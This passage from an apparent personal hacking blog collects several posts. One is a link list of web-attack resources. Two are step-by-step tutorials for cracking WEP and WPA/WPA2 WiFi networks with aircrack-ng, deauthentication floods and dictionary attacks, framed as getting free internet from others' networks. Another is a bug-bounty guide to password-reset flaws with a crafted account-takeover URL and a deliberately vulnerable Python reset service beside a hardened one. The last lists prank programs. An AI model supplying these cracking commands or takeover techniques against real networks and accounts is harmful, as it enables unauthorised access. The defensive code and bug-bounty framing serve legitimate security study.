<li>Yahoo vulnerability LFI Converted to RCE (patched)- <a href="https://soroush.secproject.com/blog/2013/10/yahoo-bug-bounty-program-lfi-reported-and-patched/">See this link</a><br />
<li>Remote Code Execution in Elasticsearch - CVE-2015-1427 Deep research <a href="http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/">See this link</a><br />
<b><br />
XML external entity attack </b><br />
<br />
<li>How to detect XXE - <a href="http://www.christian-schneider.net/GenericXxeDetection.html">See this link</a><br />
<li>XML Out-Of-Band Data Retrieval research Black Hat 2013 - <a href="https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf">Download PDF</a><br />
<li>SSRF vs. Business-critical applications: XXE tunneling in SAP - <a href="https://erpscan.com/wp-content/uploads/publications/SSRF-vs-Businness-critical-applications-final-edit.pdf">Download PDF</a><br />
<li>What you didn’t know about XXE -<a href="http://2013.appsecusa.org/2013/wp-content/uploads/2013/12/WhatYouDidntKnowAboutXXEAttacks.pdf"> Download PDF</a><br />
<br />
<b>Other few popular attacks on web application</b> <br />
<br />
<li>Server side request forgery Attacks - <a href="http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities">Slides</a><br />
<li>Cross Site Port Attacks - <a href="http://ibreak.software/2013/05/10/xspa-ssrf-bug-with-facebooks-developer-web-application/">BY Riyaz</a><br />
<li>Hunting for Top Bounties - <a href="https://www.youtube.com/watch?v=mQjTgDuLsp4">YouTube link</a><br />
<li>How to steal and modify data using Business Logic flaws - <a href="http://www.slideshare.net/fransrosen/how-to-steal-and-modify-data-using-business-logic-flaws-insecure-direct-object-references">Slides Security for developers</a><br />
<li>Exploiting CVE-2011-2461 on google.com - <a href="http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html">See the link</a><br />
<li><a href="https://pentesterlab.com/exercises/">PentesterLab</a> - PentesterLab provides vulnerable systems that can be used to test and understand vulnerabilities. (thanks @n0x00)<br />
<li>InjectX to find XSS - <a href="https://forum.bugcrowd.com/t/tutorial-injectx-to-find-xss/790">See the link</a> thanks @1N3<br />
<br />
Of course there are bugs in mobile applications too, so if you are interested in that you will definitely like the links below.<br />
<br />
<b>Android Security learning <br />
</b><br />
<li>Debugging Java Applications Using JDB - <a href="http://www.androidpentesting.com/2014/12/debugging-java-applications-using-jdb.html">See the link to learn</a><br />
<li>Learn android security testing - <a href="http://resources.infosecinstitute.com/author/srinivas/">From Srinivas</a><br />
<br />
<b>iOS application testing <br />
</b><br />
<li>Setting Up a Mobile Pentesting Platform - <a href="http://resources.infosecinstitute.com/ios-application-security-part-1-setting-up-a-mobile-pentesting-platform/">Infosec Link</a><br />
<li>iOS Application Security -<a href="http://highaltitudehacks.com/">By Prateek Gianchandani</a><br />
<br />
Advanced security researchers can follow <a href="https://www.vulnhub.com/">VULNHUB</a>. It's a great source of learning.<br />
<br />
Another important website for learning is <b>infosecinstitute</b>, which is a great place for all types of learners.<br />
<a href="http://resources.infosecinstitute.com/articles/">Security Articles</a><br />
<a href="http://resources.infosecinstitute.com/ebooks/">Security ebook</a><br />
<a href="http://resources.infosecinstitute.com/labs/">Lab For practice </a><br />
<br />
Please do comment if you have more useful links. Thanks, have a nice day, and keep learning :)<br />
Posted by Chandrakant<br />
<br />
<h3>Cracking WPA/WPA2 Password Protected WiFi Network</h3>
Published 2014-05-26T00:25:00.000+05:30, updated 2014-05-27T00:27:13.910+05:30<br />
Hi all, today we are going to discuss how a WPA/WPA2 password-protected WiFi network can be cracked. This time I am going to use a dictionary to do it; in my next tutorial I will try to show how it can be cracked even without a dictionary.<br />
So let's talk about WPA/WPA2 protected networks. In our previous tutorial (<a href="http://www.darksite.co.in/2014/05/cracking-wep-protected-wifi-network-in.html"><b>Cracking WEP easy way</b></a>) you must have seen that we were able to crack a WEP network, and using the same technique you can crack any WEP network. People say WEP is very weak, and yes, it is weak. To overcome that, another WiFi encryption was introduced, known as Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2). WPA is said to be more advanced and safer than WEP; however, as I said, it can still be hacked. To see how, follow the tutorial below step by step.<br />
<br />
First check that your BackTrack machine has its WiFi driver ready; to know more, see our previous tutorial.<br />
Type<b> ifconfig</b> in a terminal on BackTrack or Kali.<br />
<font color=blue><h3>The same procedure applies to cracking a WPA2 protected WiFi network</h3></font><br />
Now put your wlan0 interface into monitor mode, which is easily done with the command <b>airmon-ng start wlan0</b>.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-AP2SmShyeOw/U4I2u0Uv0zI/AAAAAAAAFyY/Ggg2EYKUTkQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-AP2SmShyeOw/U4I2u0Uv0zI/AAAAAAAAFyY/Ggg2EYKUTkQ/s520/1.png" /></a></div><br />
Now, to see the WiFi data packets available around you using the monitor interface (<b>mon0</b>), simply type <b>airodump-ng mon0</b> and it will display the packets available around you.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-MRN_ALj2ymk/U4I3R1AeNkI/AAAAAAAAFyg/r9TsObkCvo4/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=350 width=520 src="http://2.bp.blogspot.com/-MRN_ALj2ymk/U4I3R1AeNkI/AAAAAAAAFyg/r9TsObkCvo4/s520/2.png" /></a></div><br />
Now, as you can see, there is a WPA protected network available around us named <b>hackers</b> on <b>channel 11</b>. Now let's hack the hackers. Bring your mon0 interface to channel 11, which is easily done with <b>iwconfig mon0 channel 11</b><br />
Now write the data packets to a file, which we will use for cracking later.<br />
The command is again the simple old one: <b>airodump-ng channel 11</b> (channel number) <b>mon0</b> (interface) <b>--write crackingwpa</b><b> --bssid </b>(device bssid)<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-p_KeU-XsXUY/U4I4zUKAk2I/AAAAAAAAFys/9h8z1ZoMV2E/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=200 width=570 src="http://3.bp.blogspot.com/-p_KeU-XsXUY/U4I4zUKAk2I/AAAAAAAAFys/9h8z1ZoMV2E/s520/3.png" /></a></div><br />
Now, to be able to crack WPA we need a handshake data packet, which can be generated by sending out deauth packets from your interface. You can either broadcast deauth packets or disconnect a specific client to get the handshake done.<br />
So we will broadcast the deauth packets and then stop, in order to get the handshake done and capture it.<br />
The command to do that is <b>aireplay-ng --deauth 0 -e hackers mon0</b>. After sending some deauth packets, stop and let the handshake take place again.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-n7nSIfdABl0/U4I5u0fqoBI/AAAAAAAAFy0/i5x9pB_OqCw/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=350 width=520 src="http://2.bp.blogspot.com/-n7nSIfdABl0/U4I5u0fqoBI/AAAAAAAAFy0/i5x9pB_OqCw/s520/4.png" /></a></div>Now, as soon as you stop broadcasting the deauth packets you will get a handshake :) which makes cracking possible.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-SJMEpI3WxWI/U4I-INn3x7I/AAAAAAAAFzU/Pv6ewE9Tfuw/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=350 width=520 src="http://1.bp.blogspot.com/-SJMEpI3WxWI/U4I-INn3x7I/AAAAAAAAFzU/Pv6ewE9Tfuw/s720/5.png" /></a></div>So finally, after getting the handshake, all you have to do is use aircrack to crack the password from a password dictionary list.<br />
Now it all depends on the number of passwords in the list. To make it easy, I am giving a password list which contains 10K very likely passwords: <a href="https://raw.githubusercontent.com/discourse/discourse/master/lib/common_passwords/10k-common-passwords.txt">download best 10K password </a>. Save this as password.lst inside the root folder of aircrack, then simply run this command:<br />
<br />
aircrack-ng -w password.lst crackingwpa-01.cap<br />
And yes, you will now be able to crack the password successfully.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Z2MfRsfgQL0/U4I7li3fL-I/AAAAAAAAFzI/M4BaO__ePvc/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img height=350 width=520 src="http://1.bp.blogspot.com/-Z2MfRsfgQL0/U4I7li3fL-I/AAAAAAAAFzI/M4BaO__ePvc/s620/6.png" /></a></div>Yuppi, you can connect to that WiFi now, and the password is 12344321 :).<br />
Now, if the password contains A-Z, a-z, 0-9 and symbols such as *#$% (in other words, it is complex enough), then you need a strong password list.<br />
You can also do the cracking using John the Ripper, which might take 1-2 days or even more, so you have to be more patient there. Go to a terminal and type this to crack using John the Ripper:<br />
<b>./john –stdout –incremental:all | aircrack-ng -b 00:11:22:33:44:55 -w – /root/crackingwpa-01.cap</b><br />
<br />
Next time I will be posting about how WPA/WPA2 can be cracked without using a dictionary. Thanks, keep visiting :).<br />
Posted by Chandrakant<br />
<br />
<h3>Cracking WEP Protected WIFI Network In Easy Way</h3>
Published 2014-05-19T01:22:00.000+05:30, updated 2014-05-19T11:30:44.340+05:30<br />
Hi all, after a long time we are back with another exciting post. This time we are going to learn how to crack a WEP protected WiFi network.<br />
WEP protected WiFi networks are not very strong; they can easily be broken by anyone who has a good idea of how WiFi works. So let's go directly into the tutorial itself; I am not going to bore you with old theory.<br />
<br />
First of all we need a BackTrack machine; you can easily live boot it from a pen drive or DVD. After entering the BackTrack/Kali terminal, check whether your network card is up and running, which you can easily find out by typing <b>ifconfig </b> in the terminal.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-hk2ygNRAcTg/U3kOOQcLDnI/AAAAAAAAFxE/pXN5vitNrOk/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://4.bp.blogspot.com/-hk2ygNRAcTg/U3kOOQcLDnI/AAAAAAAAFxE/pXN5vitNrOk/s650/1.png" /></a></div>Now put your laptop's wireless network device, that is wlan0, into monitor mode (this mode enables you to see/capture the data packets that are floating in the air).<br />
The command to do that is: <b>airmon-ng start wlan0</b>. This will create the mon0 interface for monitor mode.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-vfU1Jy_QUU8/U3kOURkjuMI/AAAAAAAAFxM/zYqhhWxhI4E/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://2.bp.blogspot.com/-vfU1Jy_QUU8/U3kOURkjuMI/AAAAAAAAFxM/zYqhhWxhI4E/s520/2.png" /></a></div>Now, to see the data packets available in the air using the mon0 interface, the command is<br />
<b>airodump-ng mon0</b>. This will show you all the packets available around you.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-6Mskw_38y40/U3kOeMx3FrI/AAAAAAAAFxU/2dP31xwZsF0/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://4.bp.blogspot.com/-6Mskw_38y40/U3kOeMx3FrI/AAAAAAAAFxU/2dP31xwZsF0/s420/3.png" /></a></div>So as we can see, MGMNT is WEP protected on channel 11, and we want to hack it/break the key, so let's do it.<br />
You can set your mon0 to that specific channel; to do that, use this command:<br />
<b>iwconfig mon0 channel 11</b> (this is needed as our WiFi interface communicates better on the same channel)<br />
Next, write all the packets to a file, which we will use for cracking:<br />
<b>airodump-ng --channel</b> (channel number, here it is) <b>11</b> (interface) <b>mon0</b> <b>--write</b> name (<b>anyname</b>) <b>--bssid</b> bssid (the BSSID of the access point you want to hack).<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-VaYjGbHCw-0/U3kOnj7FilI/AAAAAAAAFxc/dIRhf2Sl2MY/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://3.bp.blogspot.com/-VaYjGbHCw-0/U3kOnj7FilI/AAAAAAAAFxc/dIRhf2Sl2MY/s420/4.png" /></a></div>After that is done, you have to generate data packets from that access point, which can be done using <b>arpreplay </b><br />
The command will be <b>aireplay-ng --arpreplay -e MGMNT mon0</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-mOdCQQYBBqg/U3kO-zkK7JI/AAAAAAAAFxs/Wq5D_Evw-18/s1600/6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://1.bp.blogspot.com/-mOdCQQYBBqg/U3kO-zkK7JI/AAAAAAAAFxs/Wq5D_Evw-18/s420/6.png" /></a></div>Now the next point: how do we get an ARP packet to replay? That can easily be done using a deauth packet or by showing a fake connection (if no devices are connected to that access point).<br />
Deauth (open a new terminal type ) <b>arpreplay-ng --deauth 0 -e MGMNT mon0</b><br />
Otherwise you can show a fake auth (if no devices are connected to the access point)<br />
<b>arpreplay-ng --fakeauth 0 -e MGMNT mon0 </b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-cdSgKsJPJEs/U3kOxs4G2II/AAAAAAAAFxk/MpVWyVR_tH4/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://1.bp.blogspot.com/-cdSgKsJPJEs/U3kOxs4G2II/AAAAAAAAFxk/MpVWyVR_tH4/s420/5.png" /></a></div>Once any client connects to access point MGMNT, your ARP replay will start showing action by pumping numerous data packets.<br />
So finally, after collecting more than 22K data packets, which is enough to crack any WEP encryption (because of weak IVs; if you want to know the technical details you can ask me by mail or chat), use <b>aircrack</b>. Again the command is simple:<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Ter2HRbtji0/U3kPEhOS5II/AAAAAAAAFx0/MJDyspI6F8w/s1600/7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://3.bp.blogspot.com/-Ter2HRbtji0/U3kPEhOS5II/AAAAAAAAFx0/MJDyspI6F8w/s420/7.png" /></a></div><b>aircrack-ng filename-01.cap</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-RgYi4VhIJ3M/U3kPKaCppEI/AAAAAAAAFx8/HI9-6QS43B8/s1600/8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" width=550 src="http://4.bp.blogspot.com/-RgYi4VhIJ3M/U3kPKaCppEI/AAAAAAAAFx8/HI9-6QS43B8/s620/8.png" /></a></div>That will display your cracked key, which you can use later to connect to that access point and then have free fun internet :).<br />
Do comment with your queries if you get stuck anywhere; we are happy to help you. Thanks.<br />
Posted by Chandrakant<br />
<br />
<h3>Password Reset Vulnerability For Bug Hunters</h3>
Published 2014-04-15T23:25:00.000+05:30, updated 2014-04-15T23:43:48.278+05:30<br />
Hi all, after a long time I decided to post something on bug bounty, as many people are getting very interested in it.<br />
So we are going to have a small discussion on how a password reset vulnerability may lead you to earn $$$ :). All these methods have been found on many sites and are good tricks that you can try during your bug bounty.<br />
<div class="center"><a href="http://2.bp.blogspot.com/-1nY0mmFQuV0/U01xWhcj3II/AAAAAAAAFvY/24Rske5MVTo/s1600/Bug-bounty-vulnerability-disclosure.jpg"><br />
<img height="199" src="http://2.bp.blogspot.com/-1nY0mmFQuV0/U01xWhcj3II/AAAAAAAAFvY/24Rske5MVTo/s900/Bug-bounty-vulnerability-disclosure.jpg" width="420" /><br />
</a><br />
<span>Password Reset Vulnerability For Bug Hunters</span><br />
</div>Most sites that have a sign-in button must also have a <b>forgot password</b> option, as of course humans can forget passwords :P. <br />
<br />
When you click on the forgot password button you will be asked for your registered email id, to which a password reset link will be sent.<br />
Here you can try the normal XSS, CSRF, etc. attacks, so I won't be discussing those; I will talk about something different.<br />
<br />
So when you submit the request (email id + maybe a captcha) you will get a mail containing a URL, like "click here to reset/change password".<br />
<br />
There are multiple kinds of URL you may get; I will discuss a few of them.<br />
<br />
Case 1: Vulnerability on url with a token email id or username<br />
<br />
https://site.com/members/resetpassword/username=xyz&emailid=abc@def@pqr.com&token=xsdf.234sdfdssd323<br />
<br />
So here you can see the username and email id are in the URL itself; in some cases you will get the username/email id both encrypted.<br />
There you can try to work out the encoding (mostly it will be either base 64 or md5). Then you can try replacing the email id and username with your desired email id/username (encrypted/un-encrypted). If that works then congo!! You have your bounty in your pocket, as sometimes the server accepts the dynamically created token, checks only for the registered email id/username at the database end, and asks you to enter a new password, which ends up giving you $$$.<br />
<br />
But sometimes your luck is not that good, and the design of the application is strong enough to check the dynamic token against the mapped user.<br />
<br />
Case 2: Vulnerability in reference <br />
<br />
https://site.com/members/resetpassword/username=xyz&emailid=abc@def@pqr.com&token=xsdf.234sdfdssd323<br />
<br />
This is quite interesting: whenever you click on a link like this and intercept the request from your browser (with Burp Suite or any proxy tool) you will see something like this:<br />
<br />
GET /xyz HTTP/1.1<br />
Host: abcd.com<br />
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: pl,en-us;q=0.7,en;q=0.3<br />
Accept-Encoding: gzip, deflate<br />
Referer: https://site.com/users/password/edit?reset_password_token=<b>HERE_IS_THE_VALUE_OF_RESET_PASSWORD_TOKEN</b><br />
Connection: keep-alive<br />
<br />
Then you can report this as a security issue, as a minimum information disclosure.<br />
<br />
In a few cases you will find<br />
<br />
Referer: https://site.com/users/password/edit?mail=admin@abc.com&password=token&action=reset<br />
<br />
that is, some email id or an admin or superuser name/email id appears there; you can also report that as a security issue and get $$$ in your pocket.<br />
<br />
Case 3: Poor Encryption Breaking (Thanks to Ajay Singh Negi for sharing this)<br />
<br />
If you get a link like this<br />
<br />
https://site.com/members/setup-password/14aaef7bb41ed6e4b46d09298ec1bfc6a483623d/ <br />
<br />
After clicking on this type of link you will land on a page with an email field filled with the attacker@gmail.com email id and 2 blank fields to change the password.<br />
<br />
Now, while submitting the request, you can easily change the email id to the victim's email id (using a proxy tool like Burp Suite) and change the password. If the validation is not there and you are lucky, you will end up resetting any victim's password on that website and get a good bounty out of it.<br />
<br />
Case 4: Analyzing password Reset Vulnerability <br />
<br />
(again a good finding by Ajay Singh Negi)<br />
<br />
So what if you get a link like this?<br />
<br />
Attackers Email ID: attackeremailid@gmail.com and his password reset link:<br />
<br />
http://testsite.com/reset-password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t2102fadb4bd021805624f06ea4c8e4d38<br />
<br />
Here, as you can guess, some md5 encryption is used. On quick analysis you can see that the 1st part of the password reset URL, before the '/', is the password reset token, and the second part is the md5 hash of the user's email id, in which the 1st 28 values (<b>74q55426l4q5u5m5c4s5l5m5n5t2</b>) are the same for every user's email id and the remaining values differ for each user, as they are the md5 hash of that user's email id. So the attacker can decrypt the email hash values easily using online md5 encrypters and decrypters like http://md5decryption.com. Sometimes websites use base 64 encoding (or other encodings), which can also be easily decoded using online base64 encoders and decoders like http://ostermiller.org/calc/encode.html.<br />
<br />
<br />
Attackers Email ID: attackeremailid@gmail.com md5 hash value:<br />
102fadb4bd021805624f06ea4c8e4d38<br />
<br />
<br />
Victims Email ID: victimemailid@gmail.com md5 hash value:<br />
05ebb8fb6ec39f50d33e19cd5719084d<br />
<br />
<br />
1st 28 values which is same for each users email id hash:<br />
74q55426l4q5u5m5c4s5l5m5n5t2<br />
<br />
<br />
Crafted URL to reset the password of the victim's email id (i.e. account) victimemailid@gmail.com:<br />
<br />
http://testsite.com/reset-password/74o4s384549484c4k4v506t4d5a3e5n5k444j4g5j4o4c553l454h464m474/74q55426l4q5u5m5c4s5l5m5n5t205ebb8fb6ec39f50d33e19cd5719084d<br />
<br />
So in this way the attacker can take over any user's account. If you find this kind of issue then you have money $$$ in your bank.<br />
<br />
So these are some common ways of detecting vulnerabilities that are typically found in the password reset function.<br />
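For the defending side of Cases 1, 3 and 4, the sketch below is an added example (not code from this post or from any site it mentions) that puts a reset check which trusts the account named in the request beside one that takes the account only from the server-side token record. The class names, the 15-minute lifetime and the example.test addresses are assumptions made for the illustration.<br />

```python
import hashlib
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime, not taken from the post

# Case 2 hardening: keep the reset URL out of the Referer header and caches.
RESET_PAGE_HEADERS = {"Referrer-Policy": "no-referrer", "Cache-Control": "no-store"}


class WeakResetService:
    """Flawed on purpose: any issued token is accepted, and the account to
    reset is whatever MD5(email) the request carries (Cases 1, 3 and 4)."""

    def __init__(self, accounts):
        self.by_md5 = {hashlib.md5(a.encode()).hexdigest(): a for a in accounts}
        self.issued = set()

    def issue(self, email):
        token = secrets.token_hex(16)
        self.issued.add(token)  # flaw: token is not tied to `email`
        return token, hashlib.md5(email.encode()).hexdigest()

    def account_for(self, token, email_md5):
        if token not in self.issued:
            return None
        return self.by_md5.get(email_md5)  # flaw: account comes from the request


class BoundResetService:
    """Token is random, stored only as a SHA-256 digest, bound to one account,
    single-use and short-lived. The request never names the account."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.pending = {}  # sha256(token) -> (account, expiry timestamp)

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, account):
        # A new request invalidates any older token for the same account.
        self.pending = {d: rec for d, rec in self.pending.items() if rec[0] != account}
        token = secrets.token_urlsafe(32)
        self.pending[self._digest(token)] = (account, self.clock() + TOKEN_TTL_SECONDS)
        return token

    def account_for(self, token, claimed_account=None):
        record = self.pending.pop(self._digest(token), None)  # pop = single use
        if record is None:
            return None
        account, expires_at = record
        if self.clock() > expires_at:
            return None
        # An email/username field in the form may be displayed, never trusted:
        # a mismatch with the bound account rejects the request outright.
        if claimed_account is not None and claimed_account != account:
            return None
        return account


def compare_services():
    """Replay the parameter swap from Case 4 against both designs."""
    attacker, victim = "attacker@example.test", "victim@example.test"  # constructed

    weak = WeakResetService([attacker, victim])
    token, _own_md5 = weak.issue(attacker)
    weak_result = weak.account_for(token, hashlib.md5(victim.encode()).hexdigest())

    bound = BoundResetService()
    token = bound.issue(attacker)
    bound_result = bound.account_for(token, claimed_account=victim)
    return weak_result, bound_result


if __name__ == "__main__":
    print(compare_services())
```

The weak service resolves the swapped request to the other account, while the bound service returns nothing and burns the token, which is the behaviour a reset endpoint's regression tests should pin down.<br />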
Also DO look out for click-jacking, CSRF, URL redirection after password reset, etc. in the password reset flow (also look at log in / log out; being automatically logged in after clicking the password recovery link also has a good impact) to build the exploit scenario better and get more $$. Hope you like this; please do leave a comment if you want more posts like this that will help you in bug bounty hunting.<br />
Posted by Chandrakant<br />
<br />
<h3>Computer Fake Viruses to Play Pranks On April Fool Day On Friends Pc</h3>
Published 2014-03-29T15:19:00.000+05:30, updated 2014-03-29T15:24:09.313+05:30<br />
Hi all, in India we play lots of pranks on our friends on the 1st, which is popularly known as April Fool Day :D.<br />
It is also special in Odisha, as people celebrate this day as <b>"Utkala Divas" (ଓଡ଼ିଶା ଦିବସ or Odisha Day)</b>.<br />
So here are some top applications you can use to play pranks on a friend's PC; I especially tried them on girls' PCs, and they will scare the hell out of you :D.<br />
<br />
<a class="center" href="http://1.bp.blogspot.com/-yH86YJUfkaM/UzaXI_GQBFI/AAAAAAAAFus/dN3AjHPHnQ4/s320/troian-virus-worm.jpg"><br />
<img alt="Funny Virus on April fool day" height="299" src="http://1.bp.blogspot.com/-yH86YJUfkaM/UzaXI_GQBFI/AAAAAAAAFus/dN3AjHPHnQ4/s720/troian-virus-worm.jpg" width="670" /><br />
</a><br />
<br />
1. Add / Remove - Add/Remove is a cool prank that makes it appear that all of your software on your computer is being removed using the Windows Add/Remove Program feature. This is so real, that it will shock the most of the experienced user.<br />
<a href="http://www.rjlpranks.com/download.cfm?d=2">Download here </a><br />
2. Avoid – It makes your Windows Start button avoid any mouse clicks. Just launch this program exe and watch as your Start button jumps away from your mouse cursor whenever you try to click on it.<br />
<a href="http://www.rjlpranks.com/pranks/avoid/">Download Here</a><br />
3. Bomb – It will run the program you want to run, then after a delay for 5 second, it will display the BOMB message. This will simulate that the program you just ran is bombed.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/bomb/download.shtml">Download Bomb</a><br />
4. Click Me – It will display a button on which you can never click with your mouse.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/clickme/download.shtml">Download Click Me</a><br />
5. ClickStart – ClickStart is one of the cool Windows prank program which hides itself in the background and after every 45 seconds it will click on the start button causing the start menu to open. Users will be surprised when their start menu pops up, they will have no idea what is going on.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/clickstart/download.shtml">Download ClickStart</a><br />
6. Clippy – It is a simulated office assistant that, when ran, will hide in the background for 1 minute then popup in the lower right hand corner of the screen and say something useless.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/clippy/download.shtml">Download Clippy</a><br />
7. Copy Cursor – It replicates the current Windows mouse cursor over-and-over again on the screen. This is VERY annoying which makes it a great prank!<br />
<a href="http://www.rjlsoftware.com/software/entertainment/copycursor/download.shtml">Download Copy Cursor</a><br />
8. Crazy Num Caps Scroll – It will toggle the Num Lock, Caps Lock, or Scroll Lock keys at user defined intervals which makes the working of any user very annoying experience.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/crazy_ncs/download.shtml">Download Crazy Num Caps Scroll</a><br />
9. Create Message Pro – It allows you to configure and create stand alone .EXE files for distribution across your network or the Internet. It adds the ability to specify the message text, buttons to appear on the message, and the type of message icon that appears.<br />
<a href="http://www.rjlsoftware.com/software/utility/createmsg/download.shtml">Download Create Message Pro</a><br />
10. Cursor Fun – It will change the current mouse cursor to a user specified cursor. It allows you to choose which Windows cursor to change, what type of cursor to change it to.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/cursorfun/download.shtml">Download Cursor Fun</a><br />
11. Dirty Mouse – It is a windows prank that simulates the mouse ball is dirty. How many times have you tried to move your mouse and it does not move.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/dirty/download.shtml">Download Dirty Mouse</a><br />
12. DownHoax – This is a great prank makes it appear as though an “unwanted” file is being downloaded from the Internet. DownHoax randomly chooses a site from its internal database of “undesirables” and proceeds to simulate downloading an equally distasteful file.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/downhoax/download.shtml">Download DownHoax</a><br />
13. Email Fun – When executed, Email Fun displays a fake email screen complete with the To:, From:, Subject: and message contents. Then it immediately pretends to automatically type an email to everyone that is in your address book.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/email/download.shtml">Download Email Fun</a><br />
14. Fake Delete – Fake Delete simulates the deletion of all files/folders in the Windows directory or whichever directory is passed via the command line. Fake Delete uses the standard Windows delete dialog so it appears very realistic, and it cannot be disabled or stopped.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/fakedel/download.shtml">Download Fake Delete</a><br />
15. Fake Format – Fake Format mirrors the Windows “Format” functionality. Once the program is started, no matter which buttons are chosen, the program simulates formatting the specified drive.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/fakefmt/download.shtml">Download Fake Format</a><br />
16. Fake Shutdown – This prank program simulates what would occur when a user chooses to shut down Windows. Each screen was cautiously created to mirror the look of the actual Windows shutdown sequence.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/fakeshutdown/download.shtml">Download Fake Shutdown</a><br />
17. Fake Start Menu – This program will replace the existing Windows 95 Start Menu (task bar). It will respond to nothing from the user.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/fakestart/download.shtml">Download Fake Start Menu</a><br />
18. Flasher – Flasher is a hidden prank program that allows you to flash any image to the computer screen, almost like a subliminal message.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/flasher/download.shtml">Download Flasher</a><br />
19. Flip It – It will display a fake Windows message that appears to have flipped upside-down. Clicking on the YES button will slowly make each piece of text rotate 180 degrees until you can read it again.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/flipit/download.shtml">Download Flip It</a><br />
20. Floppy Madness – Floppy Madness is a small prank program that will try and access the floppy drive at user specified intervals. If this does not seem fun, just download it and see.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/floppy/download.shtml">Download Floppy Madness</a><br />
21. Follow Me – When you execute this program, it will automatically hide in Windows and wait for your mouse cursor to move. Once your cursor moves, it automatically moves your Start Button to the same position, horizontally, on the Windows Task Bar.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/followme/download.shtml">Download Follow Me</a><br />
22. Gas Gripe – This program will lead you through a series of price comparisons with other liquid products. With the help of a very clean interface, Gas Gripe will have you laughing in your chair as you watch the price per gallon go up with other products.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/gas/download.shtml">Download Gas Gripe</a><br />
23. HeadAche – A program that would instantly give you a headache, download and run to know how it produce a headache.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/headache/download.shtml">Download HeadAche</a><br />
24. Message Manager Lite – Message Manager it will allow you to setup a message dialog to be displayed upon a network login. You can specify the text to be displayed, the image, the buttons (up to 9), and when to display the message.<br />
<a href="http://www.rjlsoftware.com/software/utility/message/download.shtml">Download Message Manager</a><br />
25. Mouse Droppings – Watch as your mouse drops little black turds all over your screen, randomly. This is a great joke to play on an unsuspecting co-worker, you can even email this prank to a friend.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/droppings/download.shtml">Download Mouse Droppings</a><br />
26. Mouse Move – Mouse Move is a program that can run hidden to move the user's mouse cursor to random positions on the screen.<br />
<a href="http://www.rjlsoftware.com/software/entertainment/mousemove/download.shtml">Download Mouse Move</a><br />
27. MouseClicks – MouseClicks is a harmless gag program that allows you to disable the left, right or both mouse clicks every x seconds.<br />
